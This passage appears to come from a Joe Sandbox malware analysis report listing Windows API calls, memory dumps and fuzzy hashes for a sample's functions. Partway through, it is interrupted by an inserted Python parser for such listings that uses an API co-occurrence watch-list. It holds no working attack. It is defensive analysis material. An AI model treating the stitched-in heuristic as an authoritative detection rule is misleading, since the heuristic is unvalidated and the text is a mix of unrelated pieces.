                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: CreateFrom$String$DispDispatchInfoInitializeInstanceProgTypeUninitialize_malloc
                                                            • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                            • API String ID: 2294789929-1287834457
                                                            • Opcode ID: 4dfaed0549f409efa28524cf643488acd2e6b782f2d71f2a42dfc1cbbaa944b5
                                                            • Instruction ID: adb6a6f601bf1a612e569d1fac1689f55b30b767fcafa950e0578031a668eb85
                                                            • Opcode Fuzzy Hash: 4dfaed0549f409efa28524cf643488acd2e6b782f2d71f2a42dfc1cbbaa944b5
                                                            • Instruction Fuzzy Hash: B861BC712043019FD710EF21D885B7BB3E8FB84715F10891EF9859B241E779E909CBAA
                                                            APIs
                                                              • Part of subcall function 00456391: GetCursorPos.USER32(?), ref: 004563A6
                                                              • Part of subcall function 00456391: ScreenToClient.USER32(?,?), ref: 004563C3
                                                              • Part of subcall function 00456391: GetAsyncKeyState.USER32(?), ref: 00456400
                                                              • Part of subcall function 00456391: GetAsyncKeyState.USER32(?), ref: 00456410
                                                            • DefDlgProcW.USER32(?,00000205,?,?), ref: 00471145
                                                            • ImageList_DragLeave.COMCTL32(00000000), ref: 00471163
                                                            • ImageList_EndDrag.COMCTL32 ref: 00471169
                                                            • ReleaseCapture.USER32 ref: 0047116F
                                                            • SetWindowTextW.USER32(?,00000000), ref: 00471206
                                                            • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00471216
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: AsyncDragImageList_State$CaptureClientCursorLeaveMessageProcReleaseScreenSendTextWindow
                                                            • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                            • API String ID: 2483343779-2107944366
                                                            • Opcode ID: 20a5a3ce7c175183900f948b12cd71fc676271c7bfbce6bb48b8262f94f29e03
                                                            • Instruction ID: f70d9246110d4513cc5ea0640624bfdb04bec8758509bedf4130776013c57ff9
                                                            • Opcode Fuzzy Hash: 20a5a3ce7c175183900f948b12cd71fc676271c7bfbce6bb48b8262f94f29e03
                                                            • Instruction Fuzzy Hash: D751E5706002109FD700EF59CC85BAF77A5FB89310F004A6EF945A72E2DB789D45CBAA
                                                            APIs
                                                            • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 004506A0
                                                            • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 004506B4
                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 004506D5
                                                            • _wcslen.LIBCMT ref: 00450720
                                                            • _wcscat.LIBCMT ref: 00450733
                                                            • SendMessageW.USER32(?,00001057,00000000,?), ref: 0045074C
                                                            • SendMessageW.USER32(?,00001061,?,?), ref: 0045077E
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$Window_wcscat_wcslen
                                                            • String ID: -----$SysListView32
                                                            • API String ID: 4008455318-3975388722
                                                            • Opcode ID: ffec743b0eb36e838b163f32d05296d45530ca8b23685d337e61e8ea6b23e255
                                                            • Instruction ID: d83f74bd31ff7b91e94eebeff09b40632409ca0fd113a8de7250d6f1aa6a1b31
                                                            • Opcode Fuzzy Hash: ffec743b0eb36e838b163f32d05296d45530ca8b23685d337e61e8ea6b23e255
                                                            • Instruction Fuzzy Hash: 9C51D470500308ABDB24CF64CD89FEE77A5EF98304F10065EF944A72C2D3B99959CB58
                                                            APIs
                                                              • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                              • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                            • SendMessageW.USER32(00000000,0000018C,000000FF,00000000), ref: 00469C73
                                                            • GetDlgCtrlID.USER32(00000000), ref: 00469C84
                                                            • GetParent.USER32 ref: 00469C98
                                                            • SendMessageW.USER32(00000000,?,00000111), ref: 00469C9F
                                                            • GetDlgCtrlID.USER32(00000000), ref: 00469CA5
                                                            • GetParent.USER32 ref: 00469CBC
                                                            • SendMessageW.USER32(00000000,?,00000111,?), ref: 00469CC3
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$CtrlParent$_memmove_wcslen
                                                            • String ID: ComboBox$ListBox
                                                            • API String ID: 2360848162-1403004172
                                                            • Opcode ID: 7a27601cbaa80f740c595597d901cdf30e8ed390f6d586fa417b55efe09de5c4
                                                            • Instruction ID: b77daa4920d68b7dc7b38413de7e2b04daab878370679d8231203fb1b5b646ea
                                                            • Opcode Fuzzy Hash: 7a27601cbaa80f740c595597d901cdf30e8ed390f6d586fa417b55efe09de5c4
                                                            • Instruction Fuzzy Hash: 0121E7716001187BDB00AB69CC85ABF779CEB85320F00855BFA149B2D1D6B8D845C7A5
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: _wcscpy$FolderUninitialize$BrowseDesktopFromInitializeListMallocPath
                                                            • String ID:
                                                            • API String ID: 262282135-0
                                                            • Opcode ID: 6572a5b0ab20a3b352b20f616e179ebe31bc85c3400954ff5f88a0c3e804af97
                                                            • Instruction ID: f209a7e015878e5ef66622a864ec89938c936514b9877fb167e893f071c19078
                                                            • Opcode Fuzzy Hash: 6572a5b0ab20a3b352b20f616e179ebe31bc85c3400954ff5f88a0c3e804af97
                                                            • Instruction Fuzzy Hash: 25718275900208AFCB14EF95C9849DEB7B9EF88304F00899AE9099B312D735EE45CF64
                                                            APIs
                                                            • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 004481A8
                                                            • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 004481AB
                                                            • GetWindowLongW.USER32(?,000000F0), ref: 004481CF
                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004481F2
                                                            • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00448266
                                                            • SendMessageW.USER32(?,00001074,?,00000007), ref: 004482B4
                                                            • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 004482CF
                                                            • SendMessageW.USER32(?,0000101D,00000001,00000000), ref: 004482F1
                                                            • SendMessageW.USER32(?,0000101E,00000001,?), ref: 00448308
                                                            • SendMessageW.USER32(?,00001008,?,00000007), ref: 00448320
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$LongWindow
                                                            • String ID:
                                                            • API String ID: 312131281-0
                                                            • Opcode ID: 6a3a0ce9ab1f2311975bf00a061da1b0f9e556c56634a45a126b5d9c196b7e2c
                                                            • Instruction ID: c7c5d5d6f9bf0949bb943eac7ac5a8ec30049dd2ce11923e35461b50cec8bdb0
                                                            • Opcode Fuzzy Hash: 6a3a0ce9ab1f2311975bf00a061da1b0f9e556c56634a45a126b5d9c196b7e2c
                                                            • Instruction Fuzzy Hash: 97617C70A00208AFEB10DF94DC81FEE77B9FF49714F10429AF914AB291DBB5AA41CB54
                                                            APIs
                                                              • Part of subcall function 004413AA: DeleteObject.GDI32(?), ref: 0044140B
                                                            • SendMessageW.USER32(75C123D0,00001001,00000000,?), ref: 00448E16
                                                            • SendMessageW.USER32(75C123D0,00001026,00000000,?), ref: 00448E25
                                                              • Part of subcall function 00441432: CreateSolidBrush.GDI32(?), ref: 0044147E
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$BrushCreateDeleteObjectSolid
                                                            • String ID:
                                                            • API String ID: 3771399671-0
                                                            • Opcode ID: 36703352345276820fdd923f04099b07a85a16fcace37fcd15d9f96d3dbdb764
                                                            • Instruction ID: 7c26134f999fedcb31daf2d1c178305a5bad5d5d588b7e0560cc3c70a69cf84e
                                                            • Opcode Fuzzy Hash: 36703352345276820fdd923f04099b07a85a16fcace37fcd15d9f96d3dbdb764
                                                            • Instruction Fuzzy Hash: C7511570300214ABF720DF24DC85FAE77A9EF14724F10491EFA59AB291CB79E9498B18
                                                            APIs
                                                            • GetCurrentThreadId.KERNEL32 ref: 00434643
                                                            • GetForegroundWindow.USER32(00000000), ref: 00434655
                                                            • GetWindowThreadProcessId.USER32(00000000), ref: 0043465C
                                                            • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00434671
                                                            • GetWindowThreadProcessId.USER32(?,?), ref: 0043467F
                                                            • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00434698
                                                            • AttachThreadInput.USER32(00000000,00000000,00000001), ref: 004346A6
                                                            • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 004346F3
                                                            • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434707
                                                            • AttachThreadInput.USER32(00000000,00000000,00000000), ref: 00434712
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                            • String ID:
                                                            • API String ID: 2156557900-0
                                                            • Opcode ID: 67cee910062edc5350ae4d2b9d1366d6ad4b01d413104696f98c87e4c7643c1b
                                                            • Instruction ID: 33c2ceff45d8cb0672f592c0823183733d26e7ad7419b63083ab10cfbc882f35
                                                            • Opcode Fuzzy Hash: 67cee910062edc5350ae4d2b9d1366d6ad4b01d413104696f98c87e4c7643c1b
                                                            • Instruction Fuzzy Hash: 98313EB2600204BFDB11DF69DC859AEB7A9FB9A310F00552AF905D7250E778AD40CB6C
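Added example, not part of the Joe Sandbox report: a small Python parser for the per-function records in this listing (the "APIs" call lines with their `ref:` addresses, the "Part of subcall function" lines, and the "Similarity" key/value fields), ending each record at its "Instruction Fuzzy Hash" line. The sample text embedded below is constructed from two of the records above with the indentation and "Associated" lines trimmed; the `WATCH` table is this script's own heuristic (an API co-occurrence worth a second look), not something the report states.

```python
"""Parse Joe Sandbox per-function API listings into structured records.

Added example; not code from Joe Sandbox or from the analysed sample.
"""
import re
from typing import Dict, List

# Constructed sample mirroring the report's record layout (two records).
SAMPLE = """\
APIs
• GetCurrentThreadId.KERNEL32 ref: 00434643
• GetForegroundWindow.USER32(00000000), ref: 00434655
• GetWindowThreadProcessId.USER32(00000000), ref: 0043465C
• AttachThreadInput.USER32(00000000,00000000,00000001), ref: 00434671
• AttachThreadInput.USER32(00000000,00000000,00000000), ref: 004346F3
Memory Dump Source
• Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: Thread$AttachInput$Window$Process$CurrentForeground
• String ID:
• API String ID: 2156557900-0
• Opcode Fuzzy Hash: 67cee910062edc5350ae4d2b9d1366d6ad4b01d413104696f98c87e4c7643c1b
• Instruction Fuzzy Hash: 98313EB2600204BFDB11DF69DC859AEB7A9FB9A310F00552AF905D7250E778AD40CB6C
APIs
  • Part of subcall function 004413AA: DeleteObject.GDI32(?), ref: 0044140B
• SendMessageW.USER32(75C123D0,00001001,00000000,?), ref: 00448E16
  • Part of subcall function 00441432: CreateSolidBrush.GDI32(?), ref: 0044147E
Memory Dump Source
• Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: MessageSend$BrushCreateDeleteObjectSolid
• String ID:
• API String ID: 3771399671-0
• Opcode Fuzzy Hash: 36703352345276820fdd923f04099b07a85a16fcace37fcd15d9f96d3dbdb764
• Instruction Fuzzy Hash: C7511570300214ABF720DF24DC85FAE77A9EF14724F10491EFA59AB291CB79E9498B18
"""

# One API call line: optional "Part of subcall function XXXX:", then
# Name.MODULE, optional "(args)", then "ref: ADDRESS". Handles both the
# "GetParent.USER32 ref: ..." form (no parentheses) and the normal one.
API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
# Any other "• Key: value" line (Similarity fields, Source File, ...).
FIELD_RE = re.compile(r"^\s*•\s*(?P<key>[A-Za-z ]+?):\s*(?P<val>.*?)\s*$")

# Heuristic watch-list (this script's own, not from the report): API sets that,
# when they occur together in one function, merit a closer look.
WATCH = {
    "foreground-input-attach": {"GetForegroundWindow", "AttachThreadInput"},
}


def parse_records(text: str) -> List[Dict]:
    """Return one dict per function record: {'apis': [...], 'fields': {...}}."""
    records, cur = [], {"apis": [], "fields": {}}
    for line in text.splitlines():
        m = API_RE.match(line)
        if m:
            cur["apis"].append({
                "api": m["api"],
                "module": m["mod"],
                "args": [a for a in (m["args"] or "").split(",") if a],
                "ref": int(m["ref"], 16),
                "subcall": int(m["sub"], 16) if m["sub"] else None,
            })
            continue
        f = FIELD_RE.match(line)
        if f:
            cur["fields"][f["key"]] = f["val"]
            if f["key"] == "Instruction Fuzzy Hash":  # last line of a record
                records.append(cur)
                cur = {"apis": [], "fields": {}}
    return records


def flag_records(records: List[Dict]) -> Dict[int, List[str]]:
    """Map record index -> watch-list labels whose API set is fully present."""
    hits: Dict[int, List[str]] = {}
    for i, rec in enumerate(records):
        names = {a["api"] for a in rec["apis"]}
        for label, needed in WATCH.items():
            if needed <= names:
                hits.setdefault(i, []).append(label)
    return hits


def api_index(records: List[Dict]) -> Dict[str, List[int]]:
    """Map API name -> sorted call-site addresses, for pivoting across records."""
    idx: Dict[str, List[int]] = {}
    for rec in records:
        for a in rec["apis"]:
            idx.setdefault(a["api"], []).append(a["ref"])
    return {k: sorted(v) for k, v in idx.items()}


if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    for i, rec in enumerate(recs):
        print(i, rec["fields"].get("API String ID"), [a["api"] for a in rec["apis"]])
    print("flagged:", flag_records(recs))
```

The fuzzy hashes and the "API String ID" survive in `fields`, so the same parser can be pointed at a report export to pivot on those values across samples; the watch-list only records co-occurrence within one function and does not claim anything about what the function does.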
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                            • API String ID: 0-1603158881
                                                            • Opcode ID: b2205c720eb57eaa9acd20c5cdad8c47631596d61f09c649adc7dd6ac6f1094b
                                                            • Instruction ID: 400245e8055df5988f0e80dfbae95eacb55e3b8a933f722a5dc1e2c8929bf265
                                                            • Opcode Fuzzy Hash: b2205c720eb57eaa9acd20c5cdad8c47631596d61f09c649adc7dd6ac6f1094b
                                                            • Instruction Fuzzy Hash: FAA162B5800204ABDF00EF61D8C1BEA3368AF54349F58857BEC096B146EB7D6909D77A
                                                            APIs
                                                            • CreateMenu.USER32 ref: 00448603
                                                            • SetMenu.USER32(?,00000000), ref: 00448613
                                                            • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00448697
                                                            • IsMenu.USER32(?), ref: 004486AB
                                                            • CreatePopupMenu.USER32 ref: 004486B5
                                                            • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 004486EC
                                                            • DrawMenuBar.USER32 ref: 004486F5
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                            • String ID: 0
                                                            • API String ID: 161812096-4108050209
                                                            • Opcode ID: 5f9c542d8f07ae56d95057f828c3334b95156dd137b7db0efda9360fb5a3d221
                                                            • Instruction ID: 1651b4fd0bf3e4e6d8e032b2651979207be8780685d2f09cc615cc8e1c1775d8
                                                            • Opcode Fuzzy Hash: 5f9c542d8f07ae56d95057f828c3334b95156dd137b7db0efda9360fb5a3d221
                                                            • Instruction Fuzzy Hash: 9D418B75A01209AFEB40DF98D884ADEB7B4FF49314F10815EED189B340DB74A851CFA8
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 0b34b3a5b5d670eb49a5e2d7b5cd424f37d7569b2aa50e3450060746f4beba41
                                                            • Instruction ID: 0df76164974c5272bb459d6cb57aadea20bc0786d7edd9cc69ce034119999088
                                                            • Opcode Fuzzy Hash: 0b34b3a5b5d670eb49a5e2d7b5cd424f37d7569b2aa50e3450060746f4beba41
                                                            • Instruction Fuzzy Hash: 10A1CE726083009FD310EF65D886B5BB3E9EBC4718F108E2EF559E7281D679E804CB96
                                                            APIs
                                                              • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,004A7F6C,0040F545,004A7F6C,004A90E8,004A7F6C,?,0040F545), ref: 0041013C
                                                              • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                                            • lstrcmpiW.KERNEL32(?,?), ref: 00453900
                                                            • MoveFileW.KERNEL32(?,?), ref: 00453932
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID: File$AttributesFullMoveNamePathlstrcmpi
                                                            • String ID:
                                                            • API String ID: 978794511-0
                                                            • Opcode ID: e7576e1258f6bbb5b55b57ee2c4336deeb121e8720ac0ec1c8be93e036d3feb8
                                                            • Instruction ID: 27746a5f3a3ee1b1e58f24b17d6851fe0efcb48f315c8e59f2eb92c6bb7fc6f1
                                                            • Opcode Fuzzy Hash: e7576e1258f6bbb5b55b57ee2c4336deeb121e8720ac0ec1c8be93e036d3feb8
                                                            • Instruction Fuzzy Hash: 295155B2C0021996CF20EFA1DD45BEEB379AF44305F0445DEEA0DA3101EB79AB98CB55
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1681317731.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1681305208.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681354302.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681369519.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681386532.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681403540.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1681461369.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_H1CYDJ8LQe.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: dd945b6e1d8e8d9855cf24d2d3706bb91709aa24080d3beeb23df65cd9890c42
                                                            • Instruction ID: 5433ce91f60fc94fc18d391a2a535eeaa569d09d9a52eba385401fd30cec28f3
